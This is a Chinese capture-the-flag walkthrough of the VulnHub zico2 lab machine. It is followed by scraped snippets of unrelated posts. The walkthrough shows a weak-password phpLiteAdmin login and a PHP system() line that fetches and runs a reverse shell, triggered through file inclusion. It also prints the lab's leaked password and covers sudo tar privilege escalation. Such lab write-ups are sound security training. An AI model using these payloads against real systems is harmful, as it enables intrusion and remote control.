vulnhub-zico2靶機位址
找到ip並掃瞄
dirsearch 掃下目錄
訪問
好吧。。做過的題。。這個phpliteadmin 存在乙個**執行漏洞,
這個存在弱口令,輸入admin 進入。
啟動python的http服務,準備好檔案,然後寫入語句
python3 -m http.server 80
<?php system("cd /tmp; wget +x php-reverse-shell.php; php php-reverse-shell.php");?>
已經建好
然後一般是配合首頁有檔案包含漏洞,找找就能看到
嘗試包含剛才的test.php即
注意路徑也在前面的圖里寫了
提權:仍是先一套列舉操作
有點價值的
發現存在3.2.0-23提權漏洞
存在gcc
不知道上面的為啥 但是最後在/home/zico目錄下發現了to_do.txt,目測這兒肯定有資訊,然後找到乙個密碼 swfcsfjspv9h3amqzw8
su zico
sudo -l 檢視到有可sudo許可權的命令
tar提權提權
總結:1 考察檔案包含,phpliteadmin**執行漏洞,提權方面涉及暗藏在配置檔案中密碼,tar或zip執行shell 。 難度簡單
kali滲透綜合靶機 五 zico2靶機
kali滲透綜合靶機 五 zico2靶機 一 主機發現 二 埠掃瞄 三 埠服務識別 四 漏洞發現 1.訪問發現可能存在檔案包含漏洞 2.測試是否存在檔案包含漏洞,下圖說明存在存在檔案包含漏洞 3.掃瞄 目錄 4.測試資料庫是否可寫內容,在資料庫插入 phpinfo 然後結合檔案包含 然後結合檔案包含...
軟體測試筆記(2)
黑盒測試 把軟體看成乙個黑盒子,不管內部邏輯和內部特性,只依據規格說明書檢查程式的功能是否符合功能說明 白盒測試 又稱結構測試,著重於程式內部結構和演算法,不關心功能和效能指標 灰盒測試 介於白盒和黑盒測試之間,基於程式執行時刻的外部表現同時又結合程式內部邏輯結構來設計用例,執行程式並採集程式路徑執...
軟體測試筆記2
軟體測試筆記2 1 壓力測試是測試軟體的瓶頸和極限,負載測試是效能在極限的情況下能堅持多久。2 常用來表示軟體測試過程中的三個階段,是第一階段,一般只供內部測試使用 是第二個階段,已經消除了軟體中大部分的不完善之處,但仍有可能還存在缺陷和漏洞,一般只提供給特定的使用者群來測試使用 是第三個階段,此時...